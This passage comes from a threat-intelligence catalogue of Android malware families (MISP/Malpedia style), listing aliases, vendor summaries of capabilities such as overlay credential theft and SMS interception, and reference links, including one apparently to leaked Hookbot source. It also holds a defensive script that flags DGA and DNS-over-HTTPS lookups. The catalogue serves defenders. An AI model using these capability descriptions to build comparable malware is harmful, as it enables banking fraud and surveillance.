https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/

https://thewire.in/tag/pegasus-project

https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html

https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/

https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/

https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/

https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/

https://objective-see.com/blog/blog_0x67.html

https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/

https://forbiddenstories.org/about-the-pegasus-project/

https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/

https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/

https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/

https://www.theguardian.com/news/series/pegasus-project

https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat

https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/

https://twitter.com/billmarczak/status/1416801439402262529

https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/

https://twitter.com/HackSysTeam/status/1418223814387765258?s=20

https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/

https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/

https://thewire.in/media/pegasus-project-spyware-indian-journalists

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/

https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/

Clientor

The tag is: misp-galaxy:malpedia="Clientor"

Clientor is also known as:

Table 2076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor

https://twitter.com/LukasStefanko/status/1042297855602503681

CometBot

The tag is: misp-galaxy:malpedia="CometBot"

CometBot is also known as:

Table 2079. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot

https://twitter.com/LukasStefanko/status/1102937833071935491

Connic

The tag is: misp-galaxy:malpedia="Connic"

Connic is also known as:

  • SpyBanker

Table 2080. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic

https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/

Coronavirus Android Worm

Poses as an app that can offer a "corona safety mask" but instead accesses the phone’s address book and sends SMS messages to the contacts, spreading its own download link.

The tag is: misp-galaxy:malpedia="Coronavirus Android Worm"

Coronavirus Android Worm is also known as:

Table 2082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm

https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan

https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html

Cpuminer (Android)

The tag is: misp-galaxy:malpedia="Cpuminer (Android)"

Cpuminer (Android) is also known as:

Table 2083. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer

https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/

CryCryptor

According to NHS Digital, CryCryptor is distributed via websites that spoof health organisations. At the time of publication these websites have affected the Canadian health service. CryCryptor cannot be obtained from the Google Play store, so devices restricted to only running apps from the store are not affected.

When CryCryptor is run it encrypts common file types and saves a ransom note to every directory where files have been encrypted. Encrypted files have the extension '.enc' appended to the filenames. Additional files are saved containing the salt values used in each encryption and an initialisation vector. These files have the extensions '.enc.salt' and '.enc.iv' respectively.

When files have been encrypted, a notification is displayed directing users to open the ransom note.

The tag is: misp-galaxy:malpedia="CryCryptor"

CryCryptor is also known as:

  • CryCrypter

  • CryDroid

Table 2084. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor

https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/

DAAM

According to PCrisk, DAAM is an Android malware utilized to gain unauthorized access to targeted devices since 2021. With the DAAM Android botnet, threat actors can bind harmful code with a genuine application using its APK binding service.

Lookout refers to this malware as BouldSpy and assesses with medium confidence that this Android surveillance tool is used by the Law Enforcement Command of the Islamic Republic of Iran (FARAJA).

The tag is: misp-galaxy:malpedia="DAAM"

DAAM is also known as:

  • BouldSpy

Table 2086. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam

https://www.lookout.com/blog/iranian-spyware-bouldspy

https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/

Dark Shades

The tag is: misp-galaxy:malpedia="Dark Shades"

Dark Shades is also known as:

  • Rogue

Table 2087. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades

https://twitter.com/LukasStefanko/status/1252163657036976129

DoubleAgent

The tag is: misp-galaxy:malpedia="DoubleAgent"

DoubleAgent is also known as:

Table 2092. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

DoubleLocker

The tag is: misp-galaxy:malpedia="DoubleLocker"

DoubleLocker is also known as:

Table 2093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker

https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

Dracarys

Android malware that impersonates genuine applications such as Signal, Telegram, WhatsApp, YouTube, and other chat applications, and is distributed through phishing sites.

The tag is: misp-galaxy:malpedia="Dracarys"

Dracarys is also known as:

Table 2094. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.dracarys

https://blog.cyble.com/2022/08/09/bitter-apt-group-using-dracarys-android-spyware/

DroidJack

The tag is: misp-galaxy:malpedia="DroidJack"

DroidJack is also known as:

Table 2096. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack

https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from the UK, Italy, and Spain, and sniffs 234 apps from banks located in Europe as well as crypto wallets.

The tag is: misp-galaxy:malpedia="Eventbot"

Eventbot is also known as:

Table 2102. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot

https://www.youtube.com/watch?v=qqwOrLR2rgU

https://twitter.com/ThreatFabric/status/1240664876558823424

https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born

FakeAdBlocker

The tag is: misp-galaxy:malpedia="FakeAdBlocker"

FakeAdBlocker is also known as:

Table 2106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakeadblocker

https://www.welivesecurity.com/2021/07/20/url-shortener-services-android-malware-banking-sms-trojans/

Fakecalls

According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.

The tag is: misp-galaxy:malpedia="Fakecalls"

Fakecalls is also known as:

Table 2107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakecalls

https://www.kaspersky.com.au/blog/fakecalls-banking-trojan/30379/

https://research.checkpoint.com/2023/south-korean-android-banking-menace-fakecalls/

FakeGram

The tag is: misp-galaxy:malpedia="FakeGram"

FakeGram is also known as:

  • FakeTGram

Table 2109. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram

https://blog.talosintelligence.com/2018/11/persian-stalker.html

FileCoder

According to Heimdal, a new strain of ransomware emerged on Android mobile devices. It targets those who are running Android 5.1 and higher. This Android ransomware strain has been dubbed FileCoder (Android/Filecoder.C) by security researchers, and it spreads via text messages containing a malicious link.

The tag is: misp-galaxy:malpedia="FileCoder"

FileCoder is also known as:

Table 2112. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder

https://www.welivesecurity.com/2019/07/29/android-ransomware-back/

FlexiSpy (Android)

The tag is: misp-galaxy:malpedia="FlexiSpy (Android)"

FlexiSpy (Android) is also known as:

Table 2114. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy

https://mobisec.reyammer.io/slides

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

FluBot

PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for its C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March 2021, the campaign has only intensified since.

The tag is: misp-galaxy:malpedia="FluBot"

FluBot is also known as:

  • Cabassous

  • FakeChat

Table 2116. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot

https://www.ncsc.admin.ch/22w12-de

https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html

https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/

https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/

https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users

https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon

https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html

https://twitter.com/albertosegura/status/1402615237296148483

https://mobile.twitter.com/albertosegura/status/1400396365759500289

https://twitter.com/albertosegura/status/1404098461440659459

https://twitter.com/albertosegura/status/1395675479194095618

https://therecord.media/flubot-malware-gang-arrested-in-barcelona/

https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/

https://twitter.com/albertosegura/status/1399249798063087621?s=20

https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered

https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf

https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.infinitumit.com.tr/flubot-zararlisi/

https://securityintelligence.com/posts/story-of-fakechat-malware/

https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06

https://twitter.com/albertosegura/status/1384840011892285440

https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/

https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9

https://twitter.com/malwrhunterteam/status/1359939300238983172

https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html

https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/

https://hispasec.com/resources/FedexBanker.pdf

https://www.prodaft.com/m/reports/FluBot_4.pdf

https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain

https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368

https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027

https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/

https://blog.zimperium.com/flubot-vs-zimperium/

https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/

https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones
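The FluBot description above notes that the malware resolves its C&C through a DGA and also uses DNS-over-HTTPS. The following script is an added example and is not code from the original page, from PRODAFT or from any other vendor cited here: it runs a simple triage over a few constructed DNS query log lines and flags clients that resolve several long, high-entropy, vowel-poor second-level labels and that additionally look up a public DoH resolver hostname. The log format, the thresholds, the sample domains and the resolver list are assumptions chosen for the example; FluBot's actual DGA is not reproduced.

```python
"""Heuristic triage of DNS query logs for DGA-style lookups combined with
DNS-over-HTTPS resolver use. Added example; thresholds are assumptions."""
import math
import re
from collections import defaultdict

# Hypothetical log format (constructed for this example):
# "<epoch> <client_ip> <qname> <qtype>"
LOG_LINE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+([A-Z]+)$")

# Public DoH resolver hostnames; assumption: an analyst-maintained list.
DOH_RESOLVERS = {
    "dns.google",
    "cloudflare-dns.com",
    "mozilla.cloudflare-dns.com",
    "dns.quad9.net",
}

VOWELS = set("aeiou")

# Constructed sample log; the generated-looking domains are made up.
SAMPLE_LOG = """\
1617000001 10.0.0.5 wikipedia.org A
1617000002 10.0.0.5 kxqzvtwmplrhdgbn.ru A
1617000003 10.0.0.5 dns.google A
1617000004 10.0.0.5 ptlmzqkvxrwjhfdb.com A
1617000005 10.0.0.7 example.com A
1617000006 10.0.0.7 cloudflare-dns.com A
1617000007 10.0.0.9 bzrwqkxtpmnlvhjd.cn A
""".splitlines()


def shannon_entropy(s):
    """Bits of entropy per character of the string s."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(qname):
    """Naive registrable label: the label left of the last dot."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def looks_generated(qname, min_len=12, min_entropy=3.2, max_vowel_ratio=0.3):
    """True when the second-level label is long, high-entropy and vowel-poor.
    All three thresholds are assumptions; tune against your own baseline."""
    label = second_level_label(qname)
    if len(label) < min_len:
        return False
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = (sum(c in VOWELS for c in letters) / len(letters)) if letters else 0.0
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio


def triage(lines, dga_threshold=5):
    """Return {client: {"dga": [...], "doh": [...]}} for clients that either
    resolved at least dga_threshold distinct generated-looking names, or
    resolved at least one such name and also looked up a DoH resolver."""
    per_client = defaultdict(lambda: {"dga": set(), "doh": set()})
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        _, client, qname, qtype = m.groups()
        if qtype not in ("A", "AAAA", "HTTPS"):
            continue
        qn = qname.rstrip(".").lower()
        if qn in DOH_RESOLVERS:
            per_client[client]["doh"].add(qn)
        elif looks_generated(qn):
            per_client[client]["dga"].add(qn)
    findings = {}
    for client, d in per_client.items():
        if len(d["dga"]) >= dga_threshold or (d["dga"] and d["doh"]):
            findings[client] = {"dga": sorted(d["dga"]), "doh": sorted(d["doh"])}
    return findings


if __name__ == "__main__":
    for client, hit in triage(SAMPLE_LOG).items():
        print(client, hit)
```

A lookup of a DoH resolver on its own is noise, since browsers and some operating systems use DoH legitimately; that is why the script only promotes a client on the combination, or on a burst of generated-looking names. Once an implant switches to DoH, the individual C&C names are no longer visible to the local resolver, so the resolver hostname lookups (or TLS sessions to known resolver addresses) are often the only trace left in DNS telemetry.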

FluHorse

According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.

The tag is: misp-galaxy:malpedia="FluHorse"

FluHorse is also known as:

Table 2117. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse

https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse

https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/

https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4

FlyTrap

Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries, spreading through social media hijacking, third-party app stores and sideloading.

The tag is: misp-galaxy:malpedia="FlyTrap"

FlyTrap is also known as:

Table 2118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flytrap

https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/

FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

The tag is: misp-galaxy:malpedia="FurBall"

FurBall is also known as:

Table 2120. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball

https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/

https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program

https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html

https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/

https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/

https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/

https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf

Ghimob

The tag is: misp-galaxy:malpedia="Ghimob"

Ghimob is also known as:

Table 2122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob

https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/

Gigabud

Gigabud is an Android Remote Access Trojan (RAT) that can record the victim’s screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping and other applications. Threat actors have been observed using deceptive websites to distribute it.

The tag is: misp-galaxy:malpedia="Gigabud"

Gigabud is also known as:

Table 2124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud

https://www.group-ib.com/blog/gigabud-banking-malware/

https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/

Ginp

Ginp is a mobile banking trojan targeting Android devices that was discovered by Kaspersky. The malware steals both user credentials and credit card numbers through overlay attacks; among its overlay targets is, for example, the default SMS application. What makes Ginp a remarkable family is that its operators managed to keep it undetected over time while shipping version upgrades over several years. According to ThreatFabric, Ginp has the following features:

  • Overlaying: Dynamic (local overlays obtained from the C2)

  • SMS harvesting: SMS listing

  • SMS harvesting: SMS forwarding

  • Contact list collection

  • Application listing

  • Overlaying: Targets list update

  • SMS: Sending

  • Calls: Call forwarding

  • C2 Resilience: Auxiliary C2 list

  • Self-protection: Hiding the App icon

  • Self-protection: Preventing removal

  • Self-protection: Emulation-detection

The tag is: misp-galaxy:malpedia="Ginp"

Ginp is also known as:

Table 2125. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp

https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html

https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/

https://twitter.com/ESETresearch/status/1269945115738542080

https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/

https://www.youtube.com/watch?v=WeL_xSryj8E

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://muha2xmad.github.io/malware-analysis/ginp/

GoatRAT

The tag is: misp-galaxy:malpedia="GoatRAT"

GoatRAT is also known as:

Table 2128. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.goat_rat

https://labs.k7computing.com/index.php/goatrat-attacks-automated-payment-systems/

Godfather

According to PCrisk, Godfather is an Android malware targeting online banking applications and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications, and threat actors use it to steal account credentials. Additionally, Godfather can steal SMS messages, device information and other data.

The tag is: misp-galaxy:malpedia="Godfather"

Godfather is also known as:

Table 2129. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather

https://brandefense.io/blog/godfather-android-banking-trojan/

https://github.com/LaurieWired/StrangeLoop

https://blog.group-ib.com/godfather-trojan

https://muha2xmad.github.io/malware-analysis/godfather/

GoldenEagle

The tag is: misp-galaxy:malpedia="GoldenEagle"

GoldenEagle is also known as:

Table 2130. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

GoldDigger

The tag is: misp-galaxy:malpedia="GoldDigger"

GoldDigger is also known as:

Table 2132. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gold_digger

https://www.group-ib.com/blog/golddigger-fraud-matrix/

GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

The tag is: misp-galaxy:malpedia="GPlayed"

GPlayed is also known as:

Table 2134. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

https://blog.talosintelligence.com/2018/10/gplayerbanker.html

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan whose potential targets include customers of leading international banks, users of cryptocurrency services, and popular e-commerce websites and marketplaces. Gustuff had not previously been reported. It is a new generation of malware complete with fully automated features designed to steal both fiat and cryptocurrency from user accounts en masse. The Trojan abuses the Accessibility Service, which is intended to assist people with disabilities. Analysis of a Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of the Android apps of top international banks including Bank of America, Bank of Scotland, J.P. Morgan, Wells Fargo, Capital One, TD Bank and PNC Bank, and of crypto services such as Bitcoin Wallet, BitPay, Cryptopay and Coinbase. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany and 8 in India, as well as users of 32 cryptocurrency apps.

The tag is: misp-galaxy:malpedia="Gustuff"

Gustuff is also known as:

Table 2137. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff

https://www.group-ib.com/media/gustuff/

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

https://blog.talosintelligence.com/2019/10/gustuffv2.html

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

Hermit

Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.

The tag is: misp-galaxy:malpedia="Hermit"

Hermit is also known as:

Table 2141. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit

https://www.lighthousereports.nl/investigation/revealing-europes-nso

https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/

https://de.lookout.com/blog/hermit-spyware-discovery

HeroRAT

The tag is: misp-galaxy:malpedia="HeroRAT"

HeroRAT is also known as:

Table 2142. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat

https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/

HilalRAT

A RAT that can be used to extract sensitive information such as contact lists, text messages and location information.

The tag is: misp-galaxy:malpedia="HilalRAT"

HilalRAT is also known as:

Table 2144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hilalrat

https://thehackernews.com/2022/04/microsoft-obtains-court-order-to-take.html

Hook

According to ThreatFabric, this is a malware family based on apk.ermac. Hook is the name under which its vendor, DukeEugene, advertises it. It communicates over WebSocket and has RAT capabilities.

The tag is: misp-galaxy:malpedia="Hook"

Hook is also known as:

Table 2145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook

https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html

https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware

https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/

https://github.com/0xperator/hookbot_source

Hydra

Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. It does so by asking the user to grant dangerous permissions such as Accessibility; every time the banking app is opened, the malware hijacks the session by overlaying the legitimate login page with a malicious one. The goal is the same as for other bankers: trick the user into entering login credentials, which then go straight to the malware authors.

The tag is: misp-galaxy:malpedia="Hydra"

Hydra is also known as:

Table 2146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra

https://cryptax.medium.com/android-bianlian-payload-61febabed00a

https://twitter.com/muha2xmad/status/1570788983474638849

https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0

https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726

https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/

https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221

https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html

https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace

https://muha2xmad.github.io/malware-analysis/hydra/

https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/

IRATA

According to Red Piranha, IRATA (Iranian Remote Access Trojan) is an Android malware newly detected in the wild. The infection starts with a phishing attack via SMS: the message is themed to look like a government notice and asks the recipient to download the malicious application. IRATA can collect sensitive information from the phone, including bank details. Since it sits on the device, it can also harvest SMS messages, which can then be used to obtain 2FA tokens.

The tag is: misp-galaxy:malpedia="IRATA"

IRATA is also known as:

Table 2148. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata

https://onecert.ir/portal/blog/irata

https://twitter.com/muha2xmad/status/1562831996078157826

https://muha2xmad.github.io/malware-analysis/irata/

JadeRAT

The tag is: misp-galaxy:malpedia="JadeRAT"

JadeRAT is also known as:

Table 2150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat

https://blog.lookout.com/mobile-threat-jaderat

Joker

Joker is one of the most well-known malware families on Android devices. It has repeatedly slipped past Google’s official app store by changing its code, execution process and payload-retrieval techniques. The malware steals users’ personal information, including contact details, device data and SMS messages, and abuses WAP billing to subscribe victims to premium services.

The tag is: misp-galaxy:malpedia="Joker"

Joker is also known as:

  • Bread

Table 2151. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker

https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/

https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451

https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/

https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/

https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2

https://muha2xmad.github.io/malware-analysis/hydra/

https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks---using-github-to-hide-its-payload.html

https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/

https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1

https://labs.k7computing.com/?p=22199

Koler

The tag is: misp-galaxy:malpedia="Koler"

Koler is also known as:

Table 2154. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler

https://twitter.com/LukasStefanko/status/928262059875213312

Loki

The tag is: misp-galaxy:malpedia="Loki"

Loki is also known as:

Table 2157. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki

http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/

LuckyCat

The tag is: misp-galaxy:malpedia="LuckyCat"

LuckyCat is also known as:

Table 2159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat

https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

MasterFred

According to Heimdal, MasterFred is an Android trojan that uses fake login overlays to target not only Netflix, Instagram and Twitter users but also bank customers. The attackers’ goal is to steal credit card information.

The tag is: misp-galaxy:malpedia="MasterFred"

MasterFred is also known as:

  • Brox

Table 2162. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred

https://twitter.com/AvastThreatLabs/status/1458162276708483073

Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

